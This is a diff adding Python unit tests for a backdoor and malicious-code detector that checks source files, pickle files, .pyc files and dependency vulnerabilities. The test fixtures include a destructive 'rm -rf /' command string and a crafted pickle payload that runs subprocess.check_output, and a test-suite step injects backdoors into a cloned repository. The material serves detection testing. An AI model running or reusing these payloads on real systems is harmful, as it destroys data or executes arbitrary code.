if os.getenv("OPENAI_API_KEY") is None:
|
||||
warnings.warn("OPENAI_API_KEY is not set, test skipped.", UserWarning)
|
||||
self.skipTest("OPENAI_API_KEY is not set")
|
||||
content = """a = 10
|
||||
b = a + 5
|
||||
print('This should not be detected as risky.')
|
||||
"""
|
||||
results = detectGPT(content)
|
||||
self.assertEqual(len(results["high"]), 0)
|
||||
self.assertEqual(len(results["medium"]), 0)
|
||||
self.assertEqual(len(results["low"]), 0)
|
||||
|
||||
def test_gpt_env_no_set(self):
|
||||
if os.getenv("OPENAI_API_KEY") is not None:
|
||||
self.skipTest("OPENAI_API_KEY is setted")
|
||||
content = "print('test test')"
|
||||
with self.assertRaises(ValueError):
|
||||
detectGPT(content)
|
||||
|
||||
def test_find_dangerous_functions_pyc(self):
|
||||
file_content = """import os
|
||||
os.system('rm -rf /')
|
||||
"""
|
||||
file_extension = ".pyc"
|
||||
|
||||
expected_result = {
|
||||
"high": [(2, "os.system('rm -rf /')")],
|
||||
"medium": [],
|
||||
"low": [],
|
||||
"none": [],
|
||||
}
|
||||
|
||||
result = find_dangerous_functions(file_content, file_extension)
|
||||
|
||||
self.assertEqual(result, expected_result)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main()
|
||||
168
tests/test_final_tests.py
Normal file
168
tests/test_final_tests.py
Normal file
@@ -0,0 +1,168 @@
|
||||
import time
|
||||
import unittest
|
||||
import shutil
|
||||
import os
|
||||
import threading
|
||||
import re
|
||||
|
||||
from detection.utils import read_file_content
|
||||
from .final_tests_util import (
|
||||
clone_repo,
|
||||
Path,
|
||||
inject_pickle_backdoor,
|
||||
inject_random_backdoor,
|
||||
inject_pyc_backdoor,
|
||||
backdoors,
|
||||
)
|
||||
from detection.Regexdetection import find_dangerous_functions
|
||||
from detection.GPTdetection import detectGPT
|
||||
|
||||
|
||||
def GPTdetectFileList(fileList):
|
||||
results = []
|
||||
threads = []
|
||||
for file in fileList:
|
||||
content = read_file_content(str(file))
|
||||
threads.append(threading.Thread(target=GPTThread(), args=(content, results)))
|
||||
for thread in threads:
|
||||
thread.start()
|
||||
time.sleep(0.5)
|
||||
for thread in threads:
|
||||
thread.join()
|
||||
return results
|
||||
|
||||
|
||||
def GPTThread(content, results):
|
||||
try:
|
||||
results.append(detectGPT(content))
|
||||
except Exception as e:
|
||||
print(e)
|
||||
|
||||
|
||||
class TestFinalTests(unittest.TestCase):
|
||||
def setUp(self) -> None:
|
||||
self.path = "./tmp/repo/"
|
||||
shutil.rmtree(self.path, ignore_errors=True)
|
||||
if not os.path.exists("/tmp/Python/"):
|
||||
clone_repo("https://github.com/TheAlgorithms/Python.git", "/tmp/Python")
|
||||
shutil.copytree("/tmp/Python", self.path)
|
||||
sampleRate = 0.1
|
||||
|
||||
# TODO
|
||||
# preproccessing
|
||||
|
||||
self.inject_result = inject_random_backdoor(self.path, sample_rate=sampleRate)
|
||||
self.pickle_true_num = inject_pickle_backdoor(self.path)
|
||||
self.pyc_true_num = inject_pyc_backdoor(self.path)
|
||||
self.injectedNum = len(self.inject_result)
|
||||
print(self.injectedNum)
|
||||
project_path = Path(self.path)
|
||||
|
||||
self.all_python_files = list(project_path.rglob("*.py"))
|
||||
self.py_files_num = len(self.all_python_files)
|
||||
|
||||
all_pickle_files = list(project_path.rglob("*.pickle"))
|
||||
self.pickle_files_num = len(all_pickle_files)
|
||||
|
||||
all_pyc_files = list(project_path.rglob("*.pyc"))
|
||||
self.pyc_files_num = len(all_pyc_files)
|
||||
|
||||
os.system(
|
||||
"python -m detection " + self.path + " -o " + self.path + "output.txt"
|
||||
)
|
||||
|
||||
def test_final_tests_pycode(self):
|
||||
# test backdoor code in python files
|
||||
detectedNum = 0
|
||||
possibly_dangerous_file = []
|
||||
for file in self.all_python_files:
|
||||
content = read_file_content(str(file))
|
||||
results = find_dangerous_functions(content, ".py")
|
||||
if (
|
||||
len(results["high"]) > 0
|
||||
or len(results["medium"]) > 0
|
||||
or len(results["low"]) > 0
|
||||
):
|
||||
detectedNum += 1
|
||||
possibly_dangerous_file.append(file)
|
||||
print(detectedNum / self.py_files_num)
|
||||
GPTdetectedNum = 0
|
||||
|
||||
for i in possibly_dangerous_file:
|
||||
content = read_file_content(str(i))
|
||||
results = {}
|
||||
try:
|
||||
results = detectGPT(content)
|
||||
if (
|
||||
len(results["high"]) > 0
|
||||
or len(results["medium"]) > 0
|
||||
or len(results["low"]) > 0
|
||||
):
|
||||
GPTdetectedNum += 1
|
||||
print(GPTdetectedNum)
|
||||
|
||||
except Exception as e:
|
||||
# print(e)
|
||||
pass
|
||||
|
||||
# test injected code
|
||||
with open(self.path + "output.txt", "r") as f:
|
||||
lines = f.readlines()
|
||||
injected_detected_num = 0
|
||||
injected_correct_num = 0
|
||||
pattern = r"\w+\.py: Line \d+: (.+)"
|
||||
for line in lines:
|
||||
if "py:" in line:
|
||||
injected_detected_num += 1
|
||||
match = re.search(pattern, line)
|
||||
command = ""
|
||||
if match:
|
||||
command = match.group(1)
|
||||
for backdoor in backdoors:
|
||||
if command in backdoor:
|
||||
injected_correct_num += 1
|
||||
break
|
||||
|
||||
injected_accurency = injected_detected_num / self.py_files_num
|
||||
print(f"injected files accurency: {injected_accurency}")
|
||||
try:
|
||||
GPTresult = GPTdetectFileList(possibly_dangerous_file)
|
||||
for result in GPTresult:
|
||||
if len(result) > 0:
|
||||
GPTdetectedNum += 1
|
||||
print(GPTdetectedNum)
|
||||
self.assertGreaterEqual(GPTdetectedNum, detectedNum)
|
||||
except Exception as e:
|
||||
# print(e)
|
||||
pass
|
||||
|
||||
# test pickle files
|
||||
with open(self.path + "output.txt", "r") as f:
|
||||
lines = f.readlines()
|
||||
pickle_detected_num = 0
|
||||
pickle_correct_num = 0
|
||||
for line in lines:
|
||||
if "pickle" in line:
|
||||
pickle_detected_num += 1
|
||||
if re.search(r"backdoor\d*\.pickle", line):
|
||||
pickle_correct_num += 1
|
||||
|
||||
pickle_accurency = pickle_detected_num / self.pickle_true_num
|
||||
print(f"pickle files accurency: {pickle_accurency}")
|
||||
|
||||
# test pyc files
|
||||
with open(self.path + "output.txt", "r") as f:
|
||||
lines = f.readlines()
|
||||
pyc_detected_num = 0
|
||||
pyc_correct_num = 0
|
||||
for line in lines:
|
||||
if "pyc" in line:
|
||||
pyc_detected_num += 1
|
||||
if re.search(r"backdoor\d*\.pyc", line):
|
||||
pyc_correct_num += 1
|
||||
pyc_accurency = pyc_detected_num / self.pyc_true_num
|
||||
print(f"pyc files accurency: {pyc_accurency}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main()
|
||||
56
tests/test_pickle_detection.py
Normal file
56
tests/test_pickle_detection.py
Normal file
@@ -0,0 +1,56 @@
|
||||
import unittest
|
||||
import pickle
|
||||
import tempfile
|
||||
from detection.pickle_detection import pickleScanner, pickleDataDetection
|
||||
from unittest.mock import patch
|
||||
|
||||
|
||||
class TestPickleScanner(unittest.TestCase):
|
||||
|
||||
def setUp(self):
|
||||
# Create temporary files with valid and malicious data
|
||||
self.valid_data = {"key": "value"}
|
||||
self.malicious_data = b"\x80\x03csubprocess\ncheck_output\nq\x00X\x05\x00\x00\x00echo 1q\x01\x85q\x02Rq\x03."
|
||||
|
||||
self.valid_file = tempfile.NamedTemporaryFile(delete=False)
|
||||
self.valid_file.write(pickle.dumps(self.valid_data))
|
||||
self.valid_file.close()
|
||||
|
||||
self.malicious_file = tempfile.NamedTemporaryFile(delete=False)
|
||||
self.malicious_file.write(self.malicious_data)
|
||||
self.malicious_file.close()
|
||||
|
||||
def tearDown(self):
|
||||
# Clean up temporary files
|
||||
import os
|
||||
|
||||
os.remove(self.valid_file.name)
|
||||
os.remove(self.malicious_file.name)
|
||||
|
||||
def test_valid_pickle(self):
|
||||
with open(self.valid_file.name, "rb") as file:
|
||||
scanner = pickleScanner(file)
|
||||
print(scanner.maliciousModule)
|
||||
scanner.load()
|
||||
output = scanner.output()
|
||||
self.assertEqual(output["ReduceCount"], 0)
|
||||
self.assertEqual(output["maliciousModule"], [])
|
||||
|
||||
def test_malicious_pickle(self):
|
||||
with open(self.malicious_file.name, "rb") as file:
|
||||
scanner = pickleScanner(file)
|
||||
scanner.load()
|
||||
output = scanner.output()
|
||||
self.assertEqual(output["ReduceCount"], 1)
|
||||
self.assertIn(("subprocess", "check_output"), output["maliciousModule"])
|
||||
|
||||
@patch("builtins.print")
|
||||
def test_pickleDataDetection_no_output_file(self, mock_print):
|
||||
# test output to stdout if filename is not given
|
||||
with patch("builtins.print") as mock_print:
|
||||
pickleDataDetection(self.valid_file.name)
|
||||
mock_print.assert_called_once()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main()
|
||||
97
tests/test_requirements_detection.py
Normal file
97
tests/test_requirements_detection.py
Normal file
@@ -0,0 +1,97 @@
|
||||
import unittest
|
||||
from unittest.mock import patch, Mock, MagicMock
|
||||
from detection.requirements_detection import (
|
||||
fetch_html,
|
||||
parse_html,
|
||||
format_results,
|
||||
check_vulnerabilities,
|
||||
)
|
||||
from packaging.version import Version
|
||||
from packaging.specifiers import SpecifierSet
|
||||
|
||||
# Assuming the functions from your provided code are imported here
|
||||
# from your_module import fetch_html, parse_html, format_results, ...
|
||||
|
||||
|
||||
# 测试网页抓取和结果报告的测试类
|
||||
class TestWebScrapingAndReporting(unittest.TestCase):
|
||||
|
||||
def test_fetch_html_success(self):
|
||||
"""测试fetch_html在请求成功时返回正确的HTML内容。"""
|
||||
with patch("requests.get") as mocked_get:
|
||||
mocked_get.return_value.status_code = 200
|
||||
mocked_get.return_value.text = "success"
|
||||
url = "https://security.snyk.io/vuln/pip/"
|
||||
result = fetch_html(url)
|
||||
self.assertEqual(result, "success")
|
||||
|
||||
def test_fetch_html_failure(self):
|
||||
"""测试fetch_html在请求失败时返回None。"""
|
||||
with patch("requests.get") as mocked_get:
|
||||
mocked_get.return_code.status_code = 404
|
||||
url = "https://security.snyk.io/vuln/pip/"
|
||||
result = fetch_html(url)
|
||||
self.assertIsNone(result)
|
||||
|
||||
def test_parse_html(self):
|
||||
"""测试parse_html能准确地解析HTML并提取预期的数据。"""
|
||||
html_content = """
|
||||
<table id="sortable-table">
|
||||
<tbody>
|
||||
<tr><td></td><td><a href="#">Link1</a><span>Span1</span></td></tr>
|
||||
<tr><td></td><td><a href="#">Link2</a><span>Span2</span></td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
"""
|
||||
expected = [("Link1", ["Span1"]), ("Link2", ["Span2"])]
|
||||
result = parse_html(html_content)
|
||||
self.assertEqual(result, expected)
|
||||
|
||||
def test_format_results(self):
|
||||
"""测试format_results能正确格式化解析后的数据。"""
|
||||
results = [("Package1", ["1.0", "2.0"]), ("Package2", ["1.5", "2.5"])]
|
||||
expected_output = (
|
||||
"Package Name: Package1\nVersion Ranges: 1.0, 2.0\n"
|
||||
+ "--------------------------------------------------\n"
|
||||
+ "Package Name: Package2\nVersion Ranges: 1.5, 2.5\n"
|
||||
+ "--------------------------------------------------\n"
|
||||
)
|
||||
formatted_result = format_results(results)
|
||||
self.assertEqual(formatted_result, expected_output)
|
||||
|
||||
# 测试报警
|
||||
def setUp(self):
|
||||
"""假设的依赖和漏洞数据"""
|
||||
self.requirements = {"package1": "1.0", "package2": "2.0"}
|
||||
self.vulnerabilities = {
|
||||
"package1": SpecifierSet(">=1.0,<2.0"),
|
||||
"package3": SpecifierSet(">=1.0,<1.5"),
|
||||
}
|
||||
|
||||
@patch("builtins.print") # 模拟内置的print函数以捕获输出
|
||||
def test_check_vulnerabilities_no_output_file(self, mock_print):
|
||||
"""测试当不提供输出文件时的情况,应该打印输出到控制台。"""
|
||||
check_vulnerabilities(self.requirements, self.vulnerabilities, None)
|
||||
expected_calls = [
|
||||
unittest.mock.call(
|
||||
"WARNING: package1==1.0 is vulnerable!\nOK: package2 not found in the vulnerability database."
|
||||
)
|
||||
]
|
||||
mock_print.assert_has_calls(expected_calls, any_order=True)
|
||||
|
||||
@patch("builtins.open", new_callable=unittest.mock.mock_open)
|
||||
@patch("os.path.splitext", return_value=("output", ".txt"))
|
||||
@patch("os.path.exists", return_value=False)
|
||||
@patch("os.makedirs")
|
||||
def test_check_vulnerabilities_with_output_file(
|
||||
self, mock_makedirs, mock_exists, mock_splitext, mock_open
|
||||
):
|
||||
"""测试当提供输出文件时,应该将结果写入文件。"""
|
||||
check_vulnerabilities(self.requirements, self.vulnerabilities, "output.txt")
|
||||
mock_open.assert_called_once_with("output.txt", "w", encoding="utf-8")
|
||||
handle = mock_open()
|
||||
handle.write.assert_called()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main()
|
||||
Reference in New Issue
Block a user